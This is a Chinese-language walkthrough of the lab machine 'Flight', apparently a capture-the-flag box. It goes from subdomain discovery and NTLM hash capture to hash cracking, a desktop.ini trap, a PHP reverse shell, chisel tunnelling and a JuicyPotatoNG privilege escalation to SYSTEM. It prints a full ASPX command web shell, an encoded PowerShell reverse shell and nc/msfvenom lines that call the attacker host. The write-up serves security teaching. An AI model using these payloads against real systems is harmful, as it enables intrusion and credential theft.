靶机—— Flight

admin
admin
admin
138876
文章
114
评论
2023年4月26日18:35:45评论102 views字数 7165阅读23分53秒阅读模式

靶机—— Flight

一、思路概况

1.80端口开放,纯静态页,爆破子域名发现school

2.school页面存在lfi,过滤严格无法lfi,但通过smb监听到了ntlm的hash值

3.枚举smb用户,同密码爆破出c.bum用户的smb

4.在c.bum的smb文件中,写入反弹shell的php,弹回apache的shell

5.在apache的shell中,使用RunasCs工具拿到c.bum的权限

6.netstat 发现8000端口的iis服务,写入aspx弹回iis的shell

7.通过iis的shell提权system成功

二、信息搜集

nmap端口扫描

PORT      STATE SERVICE53/tcp    open  domain80/tcp    open  http88/tcp    open  kerberos-sec135/tcp   open  msrpc139/tcp   open  netbios-ssn389/tcp   open  ldap445/tcp   open  microsoft-ds464/tcp   open  kpasswd5593/tcp   open  http-rpc-epmap636/tcp   open  ldapssl3268/tcp  open  globalcatLDAP3269/tcp  open  globalcatLDAPssl5985/tcp  open  wsman9389/tcp  open  adws49667/tcp open  unknown49673/tcp open  unknown49674/tcp open  unknown49693/tcp open  unknown

打开80端口底部发现了域名,flight.htb,加入hosts,并开始爆破子域名

靶机—— Flight

school.flight.htb 加入hosts。

echo "10.129.228.120 school.flight.htb" >> /etc/hosts

三、lfi监听hash

对其进行目录扫描,但是没发现什么东西。

靶机—— Flight

当我在网站随便点点点的时候,注意到了web参数包含文件名。

靶机—— Flight

尝试包含一些文件时,被拦截了,查看一下index.php, 发现了过滤规则

靶机—— Flight

很难绕过这个过滤器来利用这个漏洞。 url 验证部分无法进行 LFI。 但是我们可以使用此代码强制服务使用 Windows 网络共享语法获取远程源。

使用responder 开启监听

responder -I tun0 -wPv

监听到了ntlm哈希

靶机—— Flight

本地破解hash成功

S@Ss!K@*t13      (svc_apache)

靶机—— Flight

四、枚举smb用户

获取到凭证 svc_apache 后,查看一下SMB 服务中的文件夹

└─# smbclient -L //flight.htb/ -U svc_apachePassword for [WORKGROUPsvc_apache]:
        Sharename       Type      Comment        ---------       ----      -------        ADMIN$          Disk      Remote Admin        C$              Disk      Default share        IPC$            IPC       Remote IPC        NETLOGON        Disk      Logon server share         Shared          Disk              SYSVOL          Disk      Logon server share         Users           Disk              Web             Disk      Reconnecting with SMB1 for workgroup listing.do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)Unable to connect with SMB1 -- no workgroup available

使用先前获得的凭据在 SMB 上执行枚举用户

靶机—— Flight

O.Possumsvc_apacheV.StevensD.TruffI.FrancisC.BumW.WalkerS.MoonR.ColdG.LorsL.KeinkrbtgtM.Gold GuestAdministrator

同密码爆破其他用户,发现了C.bum也在使用相同的密码

靶机—— Flight

使用 impacket-smbexec,我们可以找出哪个共享文件夹是可写的。但是似乎有防御可以防止写入其他类型,传不进去exe。Shared目录可写。

五、desktop.ini 监听hash

我发现Shared 文件夹可以上传和修改 =>所以我参考了这篇文章

https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini

[.ShellClassInfo]IconResource=\10.10.14.3le

创建文件desktop.ini后,我们将其放入smb文件夹Shared

使用responder监听,拿到了ntlm的hash。

如果这里不太明白为什么会监听到hash,详见附录A

靶机—— Flight

本地john爆破hash成功

Tikkycoll_431012284 (c.bum)

靶机—— Flight

使用smb登录,发现是web的文件夹

靶机—— Flight

六、登录c.bum用户

使用 在线生成反弹shell[1] 工具,生成php的反弹shell,传上去,访问一下,拿到了shell

靶机—— Flight

使用runascs 工具登录到c.bum 用户

https://github.com/antonioCoco/RunasCs/tree/master

curl 10.10.14.3/RunasCs.exe -o runas.exerunas.exe c.bum Tikkycoll_431012284 cmd.exe -r 10.10.14.3:4466

靶机—— Flight

拿到了user权限。

七、提权system

通过netstat 发现还开了8000端口

靶机—— Flight

使用chinsel工具转发出来。

靶机curl 10.10.14.3/chisel.exe -o chisel.exechisel.exe client 10.10.14.3:1111 R:8000:127.0.0.1:8000
kali./chisel server --reverse -p 1111

靶机—— Flight

在我连接到网站时,我发现该网站是由 ASP .NET 编写的 ,很可能是高权限运行的。=> 我可以尝试上传 .aspx 来反弹shell

使用msf生成aspx的木马,上传并访问

kalimsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspxuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 10.10.14.3set LPORT 4444run

靶机curl 10.10.14.3/shell.aspx -o shell.aspx

但是却没有弹回shell,可能目标环境有某些限制不太支持。

改为上传aspx的cmd木马。

shell2.aspx<%@ Page Language="C#" AutoEventWireup="true"%><%@ import Namespace="System.Diagnostics"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server" language="C#">    protected void Page_Load(object sender, EventArgs e)    {        if(!IsPostBack) curdir.Text = Server.MapPath(".");    }    protected string RunCmd(string path, string cmd, string curdir)    {        string retval = "";        try        {            Process p = new Process();            p.StartInfo.FileName = path;            p.StartInfo.UseShellExecute = false;            p.StartInfo.WorkingDirectory = curdir;            p.StartInfo.RedirectStandardError = true;            p.StartInfo.RedirectStandardInput = true;            p.StartInfo.RedirectStandardOutput = true;            p.StartInfo.CreateNoWindow = true;            p.StartInfo.Arguments = cmd;            p.Start();            p.StandardInput.WriteLine("exit");            retval = "rn----------- 运行结果 --------------rn";            retval += p.StandardOutput.ReadToEnd();            retval += "rn----------- 程序错误 --------------rn";            retval += p.StandardError.ReadToEnd();        }        catch (Exception err)        {            retval = err.Message;        }        return retval;    }    protected void Execute_Click(object sender, EventArgs e)    {        string path = cmdpath.Text;        string cmd = cmdline.Text;        string wkdir = curdir.Text;        result.Text = RunCmd(path, cmd, wkdir);    }
</script><html xmlns="http://www.w3.org/1999/xhtml" ><head runat="server">    <title>剑眉大侠 and Cmd.aspx</title></head><body>    <form id="form1" runat="server">    <div style="text-align: left">        <span style="color: #ff99ff">Cmd.aspx powered by 剑眉大侠<br />            <br />        </span>CMD Path:<asp:TextBox ID="cmdpath" runat="server" Width="755px">c:windowssystem32cmd.exe</asp:TextBox><br />        CurrentDir:<asp:TextBox ID="curdir" runat="server" Width="755px"></asp:TextBox><br />        CMD Line:<asp:TextBox ID="cmdline" runat="server" Width="756px">/c set</asp:TextBox>        <asp:Button ID="Execute" runat="server" OnClick="Execute_Click" Text="Execute" /><br />        <br />        <asp:TextBox ID="result" runat="server" Height="460px" TextMode="MultiLine" Width="901px"></asp:TextBox></div>    </form></body></html>

curl 10.10.14.3/shell2.aspx -o shell2.aspx

反弹shell的powershell脚本

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

弹回的shell 权限是 iis

靶机—— Flight

查看一下iis用户的权限

靶机—— Flight

由于具有SeImpersonatePrivilege 权限,可以使用 JuicyPotato 来提权system

参考文章:https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato

JuicyPotatoNG工具:https://github.com/antonioCoco/JuicyPotatoNG

nc windows工具:https://eternallybored.org/misc/netcat/

至于JuicyPotato和JuicyPotatoNG工具的区别,详见附录B

需要上传这俩个文件到靶机

curl 10.10.14.3:81/JuicyPotatoNG.exe -o JuicyPotatoNG.execurl 10.10.14.3:81/nc.exe -o nc.exe

把这俩个文件的权限赋予给iis

icacls JuicyPotatoNG.exe /grant Users:Ficacls nc.exe /grant Users:F

使用iis权限的session 来提权system

C:UsersC.BumDesktopJuicyPotatoNG.exe -t * -p c:windowssystem32cmd.exe -a "/c C:UsersC.BumDesktopnc.exe -e cmd.exe 10.10.14.3 4499"

靶机—— Flight

成功提权system!

附录A

这里求助了一下羽师傅,为什么上传desktop.ini 会捕获hash

靶机—— Flight

靶机—— Flight

还有俩个参考文献

https://www.scip.ch/en/?labs.20220421

https://isc.sans.edu/diary/Desktopini+as+a+postexploitation+tool/25912

附录B

在这篇文章中详细介绍了 JuicyPotato[2]、 Juicy2[3] 的发展历史,并且JuicyPotatoNG 是他们的升级版。

https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/

靶机—— Flight

References

[1] 在线生成反弹shell: https://www.0le.cn/reverse/
[2] JuicyPotato: https://github.com/ohpe/juicy-potato
[3] Juicy2: https://decoder.cloud/2020/05/30/the-impersonation-game/


原文始发于微信公众号(靶机狂魔):靶机—— Flight

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月26日18:35:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机—— Flighthttps://cn-sec.com/archives/1693113.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息